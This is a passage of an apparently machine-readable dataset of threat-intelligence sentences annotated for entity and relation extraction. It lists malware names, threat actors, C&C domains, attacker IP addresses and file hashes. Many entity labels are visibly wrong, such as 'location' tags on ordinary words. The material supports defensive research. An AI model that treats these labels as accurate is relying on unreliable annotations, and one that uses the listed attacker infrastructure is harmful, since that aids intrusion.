https:\/\/sites.google[.]com\/view\/hhbejfdwdhwuhscbsb-xscvhdvbc\/ Abused Dropbox Properties: https:\/\/www.dropbox[.]com\/s\/68y4vpfu8pc3imf\/Iraq&Jewish.pdf ","entities":[{"id":37413,"label":"threat-actor","start_offset":16,"end_offset":21},{"id":37414,"label":"attack-pattern","start_offset":22,"end_offset":30},{"id":37415,"label":"location","start_offset":31,"end_offset":39},{"id":37416,"label":"threat-actor","start_offset":185,"end_offset":190},{"id":37417,"label":"URL","start_offset":229,"end_offset":255},{"id":37418,"label":"location","start_offset":256,"end_offset":260},{"id":37419,"label":"URL","start_offset":292,"end_offset":318},{"id":37420,"label":"location","start_offset":319,"end_offset":323},{"id":37421,"label":"URL","start_offset":340,"end_offset":366},{"id":37422,"label":"location","start_offset":367,"end_offset":371},{"id":37423,"label":"malware","start_offset":410,"end_offset":417},{"id":37424,"label":"URL","start_offset":430,"end_offset":455}],"relations":[],"Comments":[]} {"id":468,"text":"In this environment blocking and taking down DGA-related domains quickly becomes a game of \u201cwhack a mole\u201d that is sometimes futile.","entities":[],"relations":[],"Comments":[]} {"id":1889,"text":"In our previous entry, we already covered the Delphi component in the context of the Confucius and Patchwork connection.","entities":[{"id":47022,"label":"threat-actor","start_offset":85,"end_offset":94},{"id":47023,"label":"threat-actor","start_offset":99,"end_offset":108}],"relations":[],"Comments":[]} {"id":7369,"text":"The script then waits 20 minutes before it runs the wrapper script initall: 2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a initall Figure 2.","entities":[{"id":22893,"label":"location","start_offset":16,"end_offset":21},{"id":22894,"label":"TIME","start_offset":22,"end_offset":32},{"id":22895,"label":"SHA2","start_offset":76,"end_offset":140}],"relations":[],"Comments":[]} {"id":8563,"text":"Users were instructed to activate an invitation to a (fake) webinar by logging in.","entities":[],"relations":[],"Comments":[]} {"id":1875,"text":" (SC) StartService FAILED 1275: This driver has been blocked from loading","entities":[],"relations":[],"Comments":[]} {"id":1972,"text":"In fact, a 32 byte length is always read, which could lead to a buffer out-of-bounds condition.","entities":[],"relations":[],"Comments":[]} {"id":4699,"text":" The following testimony was delivered to the U.S. House Intelligence Committee by Shane Huntley, Senior Director of Google\u2019s Threat Analysis Group (TAG) on July 27, 2022. Chairman Schiff, Ranking Member Turner, and esteemed Members of the Committee: Thank you for the opportunity to appear before the Committee to discuss Google\u2019s efforts to protect users from commercial spyware.","entities":[{"id":50584,"label":"identity","start_offset":83,"end_offset":96},{"id":50585,"label":"TIME","start_offset":157,"end_offset":170},{"id":50587,"label":"identity","start_offset":324,"end_offset":330},{"id":50583,"label":"identity","start_offset":46,"end_offset":79},{"id":50586,"label":"identity","start_offset":173,"end_offset":188},{"id":50588,"label":"identity","start_offset":98,"end_offset":153}],"relations":[],"Comments":[]} {"id":3595,"text":"Note that this does not cover all the samples \u2013 it is possible that other payloads are being deployed as well.","entities":[],"relations":[],"Comments":[]} {"id":3187,"text":"We found that the BIOPASS RAT has the ability to open an HTTP service running on localhost on a port chosen from a hard-coded list.","entities":[{"id":48314,"label":"malware","start_offset":18,"end_offset":29}],"relations":[],"Comments":[]} {"id":1478,"text":"The developer is aware of this concern and plans to encourage more of its customers to sign their own applications in the coming year.","entities":[],"relations":[],"Comments":[]} {"id":1421,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} {"id":115,"text":"A challenge many organizations face is that the cloud isn\u2019t simple, and many of the technologies that make up the cloud are new, with new features being deployed all the time.","entities":[],"relations":[],"Comments":[]} {"id":3399,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 7d0d7d416db5bd7201420982987e213a129eef2314193e4558a24f3c9a91a38e flash_installer.exe ","entities":[{"id":10261,"label":"malware","start_offset":0,"end_offset":11},{"id":10262,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49062,"label":"malware","start_offset":20,"end_offset":44},{"id":49063,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":632,"from_id":49063,"to_id":49062,"type":"indicates"},{"id":633,"from_id":10262,"to_id":49062,"type":"indicates"},{"id":634,"from_id":10261,"to_id":49062,"type":"duplicate-of"},{"id":635,"from_id":10262,"to_id":49063,"type":"duplicate-of"}],"Comments":[]} {"id":12193,"text":"JuneWe terminated 33 YouTube channels as part of our investigation into coordinated influence operations linked to Azerbaijan.","entities":[],"relations":[],"Comments":[]} {"id":491,"text":"Users will interact with the window, thinking they are performing their intended function, but they are actually engaging with the attackers overlay window and executing the attacker\u2019s desired function.","entities":[],"relations":[],"Comments":[]} {"id":1524,"text":" Currently these IP addresses are alive and active.","entities":[],"relations":[],"Comments":[]} {"id":2690,"text":"Note: This is not an all-inclusive list of the protections provided by Palo Alto Networks.","entities":[{"id":8237,"label":"identity","start_offset":71,"end_offset":89}],"relations":[],"Comments":[]} {"id":2570,"text":" This underscores why credential theft is something that organizations should prioritize as a top threat and take steps to understand it and prevent it.","entities":[{"id":47767,"label":"attack-pattern","start_offset":22,"end_offset":38}],"relations":[],"Comments":[]} {"id":1196,"text":"The reason is because most SMS-based IAP SDKs include comprehensive functionalities to monitor, manage, and even intercept a user\u2019s SMS communication silently in the background, without any user interaction or knowledge.","entities":[],"relations":[],"Comments":[]} {"id":4061,"text":"The capability of ChiserClient is shown in the following table: Command code Function 0x10001","entities":[{"id":12290,"label":"malware","start_offset":18,"end_offset":30}],"relations":[],"Comments":[]} {"id":1202,"text":"According to JoloPlay\u2019s website, these 17 games have been downloaded and installed more than 1.7 million times.","entities":[{"id":46593,"label":"SOFTWARE","start_offset":13,"end_offset":22}],"relations":[],"Comments":[]} {"id":10722,"text":"The specificity of their targets stems from the social engineering tactics used.","entities":[],"relations":[],"Comments":[]} {"id":876,"text":"analysis sample PClock2 is written in Visual Basic.","entities":[{"id":46410,"label":"SOFTWARE","start_offset":39,"end_offset":51},{"id":44898,"label":"malware","start_offset":17,"end_offset":24}],"relations":[{"id":188,"from_id":44898,"to_id":46410,"type":"uses"}],"Comments":[]} {"id":5399,"text":" Figure 13.","entities":[],"relations":[],"Comments":[]} {"id":7789,"text":"log","entities":[],"relations":[],"Comments":[]} {"id":3189,"text":"It conducts this identification by testing whether the port is open or not and then by checking the response. Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":634,"text":" The latest version of the Petya ransomware is spreading over Windows SMB and is reportedly using the ETERNALBLUE exploit tool, which exploits CVE-2017-0144 and was originally released by the Shadow Brokers group in April 2017.","entities":[{"id":2111,"label":"malware","start_offset":27,"end_offset":32},{"id":2113,"label":"malware","start_offset":102,"end_offset":113},{"id":2116,"label":"threat-actor","start_offset":188,"end_offset":206},{"id":46221,"label":"SOFTWARE","start_offset":62,"end_offset":73},{"id":46222,"label":"vulnerability","start_offset":143,"end_offset":156},{"id":46223,"label":"TIME","start_offset":216,"end_offset":226}],"relations":[{"id":171,"from_id":2111,"to_id":46222,"type":"exploits"},{"id":170,"from_id":2111,"to_id":46221,"type":"targets"},{"id":172,"from_id":2116,"to_id":2113,"type":"authored-by"},{"id":173,"from_id":46222,"to_id":46221,"type":"targets"}],"Comments":[]} {"id":168,"text":" From an engineering point of view, this sole, specific targeting of files that matter significantly increases the chances of ransomware\u2019s success.","entities":[],"relations":[],"Comments":[]} {"id":2723,"text":" This vulnerability exists within the Microsoft Server Message Block 3.0 (SMBv3), specifically regarding malformed compression headers.","entities":[{"id":47964,"label":"SOFTWARE","start_offset":39,"end_offset":81}],"relations":[],"Comments":[]} {"id":793,"text":" For the foreseeable future, Microsoft may introduce more defensive mechanisms against use-after-free bugs or even heap fengshui to reduce the risk of being exploited.","entities":[{"id":46354,"label":"identity","start_offset":29,"end_offset":38}],"relations":[],"Comments":[]} {"id":13522,"text":"The US Department of Energy (DOE) recently launched the Operational Technology (OT) Defender Fellowship.","entities":[{"id":51581,"label":"identity","start_offset":4,"end_offset":33}],"relations":[],"Comments":[]} {"id":5412,"text":"In the case of Cyclops Blink, we received samples targeting Asus routers that were not previously reported on.","entities":[{"id":51416,"label":"malware","start_offset":15,"end_offset":28}],"relations":[],"Comments":[]} {"id":8965,"text":" Afterward, one more warning about the unverified developer is displayed.","entities":[],"relations":[],"Comments":[]} {"id":3946,"text":" Execution of arbitrary commands via session id","entities":[],"relations":[],"Comments":[]} {"id":7305,"text":"OceanLotus commands and descriptions","entities":[{"id":22767,"label":"malware","start_offset":0,"end_offset":10},{"id":22768,"label":"location","start_offset":20,"end_offset":23}],"relations":[],"Comments":[]} {"id":5446,"text":" What is it?","entities":[],"relations":[],"Comments":[]} {"id":4985,"text":"We assess with high confidence this vulnerability was sold by an exploit broker and probably abused by more than one surveillance vendor.","entities":[],"relations":[],"Comments":[]} {"id":1794,"text":"The ADSS JAVA component (C:\\ManageEngine\\ADSelfService Plus\\jre\\bin\\java.exe) executed mshta.exe to remotely run a remotely-hosted HTML application (HTA) file from the attackers\u2019 command and control (C&C) server.","entities":[{"id":45134,"label":"FILEPATH","start_offset":25,"end_offset":76},{"id":45135,"label":"FILEPATH","start_offset":87,"end_offset":96}],"relations":[],"Comments":[]} {"id":8642,"text":"In our environment, we did not receive any payloads past this stage.","entities":[],"relations":[],"Comments":[]} {"id":14356,"text":"Two months later, the C&C server was changed to hxxp:\/\/miakhalifagame[.]com.","entities":[{"id":51789,"label":"URL","start_offset":48,"end_offset":75}],"relations":[],"Comments":[]} {"id":5705,"text":"This script was designed to show a social engineering message \u2014 typically a Flash update popup or a DNS error (note that Adobe discontinued Flash Player at the end of December 2020) that then instructed the visitor to download a malicious file that turned out to be a Cobalt Strike loader.","entities":[],"relations":[],"Comments":[]} {"id":731,"text":"Additionally, Prisma Cloud users can also build a custom vulnerability detection rule to identify if any system is running an OMI package with a version previous to 1.6.8.1.","entities":[{"id":46314,"label":"SOFTWARE","start_offset":14,"end_offset":26},{"id":46315,"label":"SOFTWARE","start_offset":126,"end_offset":129}],"relations":[],"Comments":[]} {"id":4552,"text":"This is the first known instance of Turla distributing Android-related malware.","entities":[{"id":50361,"label":"threat-actor","start_offset":36,"end_offset":41},{"id":50362,"label":"SOFTWARE","start_offset":55,"end_offset":62}],"relations":[{"id":949,"from_id":50361,"to_id":50362,"type":"targets"}],"Comments":[]} {"id":7732,"text":"Enabling the macros of the Excel file downloads a file created using NSIS installer with ServHelper from 79[.]141[.]168[.]105 or 195[.]123[.]213[.]126.","entities":[{"id":24012,"label":"malware","start_offset":69,"end_offset":73},{"id":24013,"label":"tools","start_offset":89,"end_offset":99},{"id":24014,"label":"IPV4","start_offset":105,"end_offset":125},{"id":24015,"label":"IPV4","start_offset":129,"end_offset":150}],"relations":[],"Comments":[]} {"id":2171,"text":"Palo Alto Networks and Unit 42 will continue to monitor for evidence of exploitation and further novel use cases.","entities":[{"id":47305,"label":"identity","start_offset":0,"end_offset":18},{"id":47306,"label":"identity","start_offset":23,"end_offset":30}],"relations":[],"Comments":[]} {"id":9787,"text":"Apart from knowledge and awareness of phishing and social engineering, it is also important to be prepared with effective and layered security solutions.","entities":[{"id":29806,"label":"location","start_offset":21,"end_offset":24},{"id":29807,"label":"attack-pattern","start_offset":38,"end_offset":46},{"id":29808,"label":"location","start_offset":47,"end_offset":50},{"id":29809,"label":"location","start_offset":122,"end_offset":125},{"id":29810,"label":"location","start_offset":134,"end_offset":142}],"relations":[],"Comments":[]} {"id":14332,"text":"The adult game first used by the attackers was also found in the list of games advertised by hxxp:\/\/www[.]roundyearfun[.]org Our analysis revealed that hxxp:\/\/www[.]roundyearfun[.]org was also used as a C&C address to save victims\u2019 data.","entities":[{"id":48560,"label":"Infrastucture","start_offset":202,"end_offset":207},{"id":48558,"label":"URL","start_offset":93,"end_offset":124},{"id":48559,"label":"URL","start_offset":152,"end_offset":183}],"relations":[],"Comments":[]} {"id":977,"text":"We have captured over 18,000 samples that contain the SMS stealing library since August 2015, meaning the number of affected users is considerable.","entities":[{"id":46473,"label":"TIME","start_offset":81,"end_offset":92},{"id":46474,"label":"attack-pattern","start_offset":54,"end_offset":66}],"relations":[],"Comments":[]} {"id":13862,"text":"Apart from locking Colonial Pipeline\u2019s computer systems, DarkSide also stole over 100 GB of corporate data.","entities":[{"id":42986,"label":"threat-actor","start_offset":57,"end_offset":65}],"relations":[],"Comments":[]} {"id":14102,"text":"Figure 12 shows a comparison between the two samples.","entities":[],"relations":[],"Comments":[]} {"id":2731,"text":"For client mitigation, recommend creating an outbound firewall rule to block SMB outbound on public and private interfaces.","entities":[{"id":47973,"label":"SOFTWARE","start_offset":77,"end_offset":80}],"relations":[],"Comments":[]} {"id":9737,"text":"Our analysis revealed that they drop a new backdoor, which is written in PowerShell as MuddyWater\u2019s known POWERSTATS backdoor.","entities":[{"id":29706,"label":"attack-pattern","start_offset":73,"end_offset":83},{"id":29708,"label":"malware","start_offset":106,"end_offset":116}],"relations":[],"Comments":[]} {"id":1323,"text":"The following information is collected:","entities":[],"relations":[],"Comments":[]} {"id":7799,"text":"Conclusion","entities":[],"relations":[],"Comments":[]} {"id":10549,"text":"Google\u2019s Threat Analysis Group (TAG) is a specialized team of security experts that works to identify, report, and stop government-backed phishing and hacking against Google and the people who use our products.","entities":[{"id":32158,"label":"location","start_offset":62,"end_offset":70},{"id":32159,"label":"location","start_offset":111,"end_offset":114},{"id":32160,"label":"location","start_offset":115,"end_offset":119},{"id":32161,"label":"attack-pattern","start_offset":138,"end_offset":146},{"id":32162,"label":"location","start_offset":147,"end_offset":150},{"id":32164,"label":"location","start_offset":174,"end_offset":177}],"relations":[],"Comments":[]} {"id":1939,"text":"For one, there is the domain pikrpro[.]eu and its subdomains\u2014the islamicfinderfeedback[.]pikrpro[.]eu and the memrifilesforinfo[.]pikpro[.]eu.","entities":[{"id":47063,"label":"DOMAIN","start_offset":110,"end_offset":141},{"id":47061,"label":"DOMAIN","start_offset":29,"end_offset":41},{"id":47062,"label":"DOMAIN","start_offset":65,"end_offset":101}],"relations":[],"Comments":[]} {"id":8570,"text":"Although Play Store users were protected, we are highlighting the app here as TAG has seen APT35 attempt to distribute this spyware on other platforms as recently as July 2021.","entities":[{"id":26484,"label":"location","start_offset":45,"end_offset":48},{"id":26485,"label":"threat-actor","start_offset":91,"end_offset":96}],"relations":[],"Comments":[]} {"id":13687,"text":"We found a BEC mail sample that was sent from the same IP.","entities":[],"relations":[],"Comments":[]} {"id":718,"text":"Unit 42 recommends customers upgrade to the latest release of Confluence Server and Data Center.","entities":[{"id":46285,"label":"identity","start_offset":0,"end_offset":7},{"id":46286,"label":"SOFTWARE","start_offset":62,"end_offset":95}],"relations":[],"Comments":[]} {"id":916,"text":" After it finished the encryption routine, PClock2 generates a VBScript file in the following directory:","entities":[{"id":46437,"label":"malware","start_offset":43,"end_offset":50},{"id":46438,"label":"SOFTWARE","start_offset":63,"end_offset":71}],"relations":[],"Comments":[]} {"id":10043,"text":"One of the files, rsync, is an initially obfuscated Perl-based Shellbot capable of multiple backdoor commands such as file downloading, shell cmd execution, and DDoS. Figure 4. Obfuscated Perl script Figure 5.","entities":[{"id":30647,"label":"location","start_offset":0,"end_offset":3},{"id":30648,"label":"location","start_offset":52,"end_offset":56},{"id":30649,"label":"location","start_offset":136,"end_offset":141},{"id":30650,"label":"malware","start_offset":142,"end_offset":145},{"id":30651,"label":"location","start_offset":157,"end_offset":160},{"id":30653,"label":"location","start_offset":189,"end_offset":193}],"relations":[],"Comments":[]} {"id":1881,"text":"BAT.KILLAV.YACAA","entities":[],"relations":[],"Comments":[]} {"id":13626,"text":"Communication with C&C uses sockets and is encrypted with simple SUB 0x46, XOR 0x19 encryption.","entities":[],"relations":[],"Comments":[]} {"id":2215,"text":" The downloaded file is dropped to the system32 folder.","entities":[{"id":47321,"label":"FILEPATH","start_offset":39,"end_offset":47}],"relations":[],"Comments":[]} {"id":3653,"text":"It also takes spear phishing attacks to a level that makes it nearly impossible to distinguish an attack email from a legitimate email.","entities":[{"id":11070,"label":"attack-pattern","start_offset":14,"end_offset":28}],"relations":[],"Comments":[]} {"id":7810,"text":"As they continue to target businesses in different sectors, we can expect TA505 to keep using phishing and social engineering techniques to compromise systems.","entities":[{"id":24197,"label":"location","start_offset":20,"end_offset":26},{"id":24198,"label":"location","start_offset":63,"end_offset":66},{"id":24200,"label":"attack-pattern","start_offset":94,"end_offset":102},{"id":24201,"label":"location","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} {"id":1379,"text":"Two instances of PowerShell are spawned with an encoded command to sleep for 10 seconds, e.g. C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== 3.","entities":[{"id":46711,"label":"FILEPATH","start_offset":94,"end_offset":151},{"id":46712,"label":"tools","start_offset":17,"end_offset":27}],"relations":[],"Comments":[]} {"id":1435,"text":"When an app is published to the Google Play Store, the certificate information is included within the APK file.","entities":[{"id":46767,"label":"SOFTWARE","start_offset":32,"end_offset":49}],"relations":[],"Comments":[]} {"id":3233,"text":" If the file (that is, the marker) is not found, the backdoor creates a new one and writes the current timestamp onto it.","entities":[],"relations":[],"Comments":[]} {"id":1942,"text":"The decoy documents tell more about Urpage's possible targets, as it contains text from articles about the region of Kashmir.","entities":[{"id":47066,"label":"threat-actor","start_offset":36,"end_offset":42},{"id":47067,"label":"location","start_offset":117,"end_offset":124}],"relations":[{"id":300,"from_id":47066,"to_id":47067,"type":"targets"}],"Comments":[]} {"id":931,"text":"AutoFocus users can find more information on samples and indicators related to this attack by viewing the PClock tag.","entities":[{"id":46448,"label":"malware","start_offset":106,"end_offset":112}],"relations":[],"Comments":[]} {"id":1475,"text":" We\u2019ve contacted the developer to confirm they have retained sole custody of the keys.","entities":[],"relations":[],"Comments":[]} {"id":1485,"text":"Again, using the same private key is probably due to the convenience in app management.","entities":[],"relations":[],"Comments":[]} {"id":7736,"text":"Similar to the routine variant in Figure 6, the Excel VBA macros retrieve the FlawedAmmyy downloader from hxxp:\/\/195[.]123[.]245[.]185\/r1 or hxxp:\/\/185[.]225[.]17[.]5\/r1, in then decrypts and executes FlawedAmmyy RAT from hxxp:\/\/185[.]225[.]17[.]5\/2.dat or hxxp:\/\/195[.]123[.]245[.]185\/1.dat.","entities":[{"id":24027,"label":"location","start_offset":48,"end_offset":53},{"id":24028,"label":"malware","start_offset":78,"end_offset":89},{"id":24029,"label":"location","start_offset":188,"end_offset":191},{"id":24030,"label":"malware","start_offset":201,"end_offset":212}],"relations":[],"Comments":[]} {"id":10859,"text":"tfsdne:","entities":[],"relations":[],"Comments":[]} {"id":1023,"text":"The price for this custom account was only \u00a527 RMB ($4.40 USD); for an extra \u00a513 RMB ($2.12 USD), the buyer can request a custom username at any subdomain for the given institution.","entities":[],"relations":[],"Comments":[]} {"id":893,"text":" Figure 4. HTTP POST request containing file paths of malware After installation, PClock2 will also set the following registry key with a value of \u2018INSTALL_OK\u2019.","entities":[{"id":46422,"label":"malware","start_offset":83,"end_offset":90}],"relations":[],"Comments":[]} {"id":3954,"text":"Credential access","entities":[],"relations":[],"Comments":[]} {"id":14211,"text":"The malware we analyzed is separated in two files: a loader, and the payload.","entities":[],"relations":[],"Comments":[]} {"id":13548,"text":"The question asked on a forum showing the payload related to Water Pamola.","entities":[{"id":51624,"label":"campaign","start_offset":61,"end_offset":73}],"relations":[],"Comments":[]} {"id":4455,"text":"TAG tracks and proactively counters serious state-sponsored and financially motivated information cyber criminal activities, such as hacking and the use of spyware.","entities":[{"id":50232,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":231,"text":"A phishing webpage targeting a Ukrainian state administration employee, detected by our in-house machine learning models on March 16.Our teams at Palo Alto Networks are actively monitoring the phishing landscape surrounding Ukraine-related URLs and are sharing this threat intelligence with relevant authorities in Ukraine and internationally.","entities":[{"id":765,"label":"attack-pattern","start_offset":2,"end_offset":10},{"id":771,"label":"attack-pattern","start_offset":193,"end_offset":201},{"id":44647,"label":"identity","start_offset":31,"end_offset":70},{"id":44648,"label":"TIME","start_offset":124,"end_offset":132},{"id":44649,"label":"identity","start_offset":146,"end_offset":164},{"id":44650,"label":"location","start_offset":315,"end_offset":322}],"relations":[{"id":135,"from_id":765,"to_id":44647,"type":"targets"},{"id":136,"from_id":771,"to_id":44650,"type":"targets"}],"Comments":[]} {"id":4223,"text":"The application is a simple downloader that sends some basic information (username, antivirus, IP address, and operating system version) encrypted using triple Data Encryption Standard (DES). Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":2809,"text":"Unit 42 is not aware of any reports where paying the ransom to the WanaCrypt0r attackers has resulted in the recovery of data.","entities":[{"id":48028,"label":"identity","start_offset":0,"end_offset":7},{"id":8587,"label":"malware","start_offset":67,"end_offset":78}],"relations":[],"Comments":[]} {"id":14377,"text":"On one end of the spectrum are places like universities that maybe manage 10% of the endpoints on their network.","entities":[],"relations":[],"Comments":[]} {"id":4543,"text":"While we continue to fight these threats on a technical level, the providers of these capabilities operate openly in democratic countries.","entities":[],"relations":[],"Comments":[]} {"id":2580,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) The Lapsus$ Group threat actor has grown in just a few months from launching a handful of destructive attacks to stealing and publishing source code of multiple top-tier technology companies.","entities":[{"id":45601,"label":"threat-actor","start_offset":57,"end_offset":64}],"relations":[],"Comments":[]} {"id":13593,"text":"The script for modifying the shop page header to inject a web shell","entities":[{"id":51682,"label":"malware","start_offset":4,"end_offset":10}],"relations":[],"Comments":[]} {"id":8391,"text":"In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.","entities":[],"relations":[],"Comments":[]} {"id":4522,"text":"Google manages a vulnerability rewards program (VRP), rewarding researchers millions of dollars for their contributions in securing our devices and platforms.","entities":[{"id":50320,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":1419,"text":"While we haven\u2019t seen any indication that the spam volume has begun to slow down, we do expect the campaign to wind down in the next 24 hours, but a new campaign will probably be close behind.","entities":[{"id":4262,"label":"TIME","start_offset":124,"end_offset":141}],"relations":[],"Comments":[]} {"id":3527,"text":"We also found that these versions encrypt the communication to its C&C servers.","entities":[],"relations":[],"Comments":[]} {"id":2571,"text":"We\u2019ve recently published a new Unit 42 white paper on credential theft that we encourage you to read.","entities":[{"id":45597,"label":"identity","start_offset":31,"end_offset":38},{"id":45598,"label":"attack-pattern","start_offset":54,"end_offset":70}],"relations":[],"Comments":[]} {"id":9231,"text":"CISA ordered government agencies to patch now or disconnect their on-premises Exchange servers.","entities":[],"relations":[],"Comments":[]} {"id":11688,"text":" The following table shows their targets, related phishing domains, and lure documents used in each of the phishing attacks. Date Phishing Domain Targeted Organization Targeted Mail server Redirection after login 2019 Nov Government of Nepal mail.nepal.gov.np Redirect to file \u201cIMG_0002.pdf\u201d 2019 Nov Ministry of Defence, Nepal mail.mod.gov.np Redirect to original mail server 2019 Dec mail-","entities":[{"id":35857,"label":"attack-pattern","start_offset":50,"end_offset":58},{"id":35858,"label":"location","start_offset":68,"end_offset":71},{"id":35859,"label":"location","start_offset":72,"end_offset":76},{"id":35860,"label":"attack-pattern","start_offset":107,"end_offset":115},{"id":35861,"label":"location","start_offset":126,"end_offset":130},{"id":35862,"label":"attack-pattern","start_offset":132,"end_offset":140},{"id":35864,"label":"location","start_offset":246,"end_offset":251},{"id":35867,"label":"location","start_offset":339,"end_offset":344}],"relations":[],"Comments":[]} {"id":158,"text":"This was well-intentioned but ultimately backfired: users got fed up clicking \u201cAre you sure?\u201d dialog boxes and quickly disabled the feature, or just mindlessly clicked \u201cOK\u201d every time they saw it.","entities":[],"relations":[],"Comments":[]} {"id":10957,"text":"And as others have reported, we\u2019re seeing a resurgence in COVID-related hacking and phishing attempts from numerous commercial and government-backed attackers.","entities":[{"id":33324,"label":"location","start_offset":0,"end_offset":3},{"id":33325,"label":"location","start_offset":80,"end_offset":83},{"id":33326,"label":"attack-pattern","start_offset":84,"end_offset":92},{"id":33327,"label":"location","start_offset":127,"end_offset":130}],"relations":[],"Comments":[]} {"id":9698,"text":"Scrambling \u2018Mac OSX 10.12\u2019 Encryption","entities":[],"relations":[],"Comments":[]} {"id":14073,"text":"However, these are not the only commonalities.","entities":[],"relations":[],"Comments":[]} {"id":14171,"text":"With bipartisan support, the decision was made to deprive the Putin regime of the economic resources needed to wage war in Ukraine.","entities":[{"id":48215,"label":"identity","start_offset":62,"end_offset":68},{"id":48216,"label":"location","start_offset":123,"end_offset":130}],"relations":[],"Comments":[]} {"id":13721,"text":"And since the API hooking shellcode adopts a generic approach, a similar code snippet might be used to target other products in the future and make Waterbear harder to detect.","entities":[{"id":42665,"label":"location","start_offset":0,"end_offset":3},{"id":42666,"label":"attack-pattern","start_offset":18,"end_offset":25},{"id":42667,"label":"location","start_offset":103,"end_offset":109},{"id":42668,"label":"location","start_offset":139,"end_offset":142}],"relations":[],"Comments":[]} {"id":8739,"text":"We terminated 12 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Russia.","entities":[],"relations":[],"Comments":[]} {"id":6857,"text":"It was last updated on May 27, 2020.","entities":[],"relations":[],"Comments":[]} {"id":3468,"text":"Marade will check if the infected host can connect to the internet and if it is installed with anti-virus (AV) software.","entities":[{"id":49266,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":2578,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":13002,"text":"There were no accounts compromised from this campaign and Google will alert all targeted users of these attempts through our monthly government-backed attacker warnings.","entities":[],"relations":[],"Comments":[]} {"id":6103,"text":" Of note, three of the Google Code projects associated with the newly uncovered account were added during the past few days, indicating it is still in active use. Below is a current screenshot of the newly uncovered Google Code account\u2019s projects.","entities":[],"relations":[],"Comments":[]} {"id":11740,"text":"We blocked 1.6M messages to targets, displayed ~62K Safe Browsing phishing page warnings, blocked 2.4K files, and successfully restored ~4K accounts.","entities":[{"id":36187,"label":"location","start_offset":52,"end_offset":56},{"id":36188,"label":"attack-pattern","start_offset":66,"end_offset":74},{"id":36189,"label":"location","start_offset":75,"end_offset":79},{"id":36192,"label":"location","start_offset":110,"end_offset":113}],"relations":[],"Comments":[]} {"id":2969,"text":"Even though not all devices can use password managers directly, it\u2019s still one of the best things you can set up.","entities":[],"relations":[],"Comments":[]} {"id":2895,"text":"= 3096481936;","entities":[],"relations":[],"Comments":[]} {"id":4169,"text":"Right: TClient)","entities":[{"id":12519,"label":"malware","start_offset":7,"end_offset":14}],"relations":[],"Comments":[]} {"id":5282,"text":"This list aims to aid cybersecurity defenders in searching for affected devices in their networks and starting the remediation process.","entities":[],"relations":[],"Comments":[]} {"id":4667,"text":"A log file is written containing a count of the emails that were downloaded.","entities":[],"relations":[],"Comments":[]} {"id":465,"text":" Even then, taking down sites that malware using a DGA can be a challenge as defenders have to go through the process of working with ISPs to take down these malicious domains one by one.","entities":[{"id":46124,"label":"identity","start_offset":134,"end_offset":137}],"relations":[],"Comments":[]} {"id":5035,"text":"In mid-April, TAG detected a Ghostwriter credential phishing campaign targeting Facebook users.","entities":[{"id":51105,"label":"TIME","start_offset":3,"end_offset":12},{"id":51106,"label":"identity","start_offset":14,"end_offset":17},{"id":51107,"label":"threat-actor","start_offset":29,"end_offset":40},{"id":51108,"label":"SOFTWARE","start_offset":80,"end_offset":88}],"relations":[],"Comments":[]} {"id":1745,"text":"In recent research, we found attackers were using fake versions of some well-known and well-trusted sites:","entities":[],"relations":[],"Comments":[]} {"id":9930,"text":"First seen Last seen 5.135.120.57 12\/4\/18 1\/24\/19 5.135.199.25 3\/3\/19 3\/3\/19 31.7.62.48 9\/26\/18 9\/29\/18 51.77.11.46 7\/1\/19 7\/2\/19 54.36.73.108 7\/22\/19 10\/05\/19 54.37.48.172 10\/22\/19 11\/05\/19 54.38.124.150 10\/28\/18 11\/17\/18 88.150.221.107 9\/26\/19 11\/07\/19 91.134.203.59 9\/26\/18 12\/4\/18 109.169.89.103 12\/2\/18 12\/14\/18 109.200.24.114 11\/19\/18 12\/25\/18 137.74.80.220 9\/29\/18 10\/23\/18 137.74.157.84 12\/18\/18 10\/21\/19 185.122.56.232 9\/29\/18 11\/4\/18 185.125.204.57 10\/25\/18 1\/14\/19 185.175.138.173 1\/19\/19 1\/22\/19 188.165.119.138 10\/8\/18 11\/19\/18 193.70.71.112 3\/7\/19 3\/17\/19 195.154.41.72 1\/13\/19 1\/20\/19 213.32.113.159 6\/30\/19 9\/16\/19 216.244.93.137 12\/10\/18 12\/21\/18 Table 3.","entities":[{"id":30295,"label":"IPV4","start_offset":22,"end_offset":34},{"id":30296,"label":"IPV4","start_offset":51,"end_offset":63},{"id":30297,"label":"IPV4","start_offset":78,"end_offset":88},{"id":30298,"label":"IPV4","start_offset":105,"end_offset":116},{"id":30299,"label":"IPV4","start_offset":131,"end_offset":143},{"id":30300,"label":"IPV4","start_offset":161,"end_offset":173},{"id":30301,"label":"IPV4","start_offset":192,"end_offset":205},{"id":30302,"label":"IPV4","start_offset":224,"end_offset":238},{"id":30303,"label":"IPV4","start_offset":256,"end_offset":269},{"id":30304,"label":"IPV4","start_offset":286,"end_offset":300},{"id":30305,"label":"IPV4","start_offset":318,"end_offset":332},{"id":30306,"label":"IPV4","start_offset":351,"end_offset":364},{"id":30307,"label":"IPV4","start_offset":382,"end_offset":395},{"id":30308,"label":"IPV4","start_offset":414,"end_offset":428},{"id":30309,"label":"IPV4","start_offset":445,"end_offset":459},{"id":30310,"label":"IPV4","start_offset":477,"end_offset":492},{"id":30311,"label":"IPV4","start_offset":509,"end_offset":524},{"id":30312,"label":"IPV4","start_offset":542,"end_offset":555},{"id":30313,"label":"IPV4","start_offset":571,"end_offset":584},{"id":30314,"label"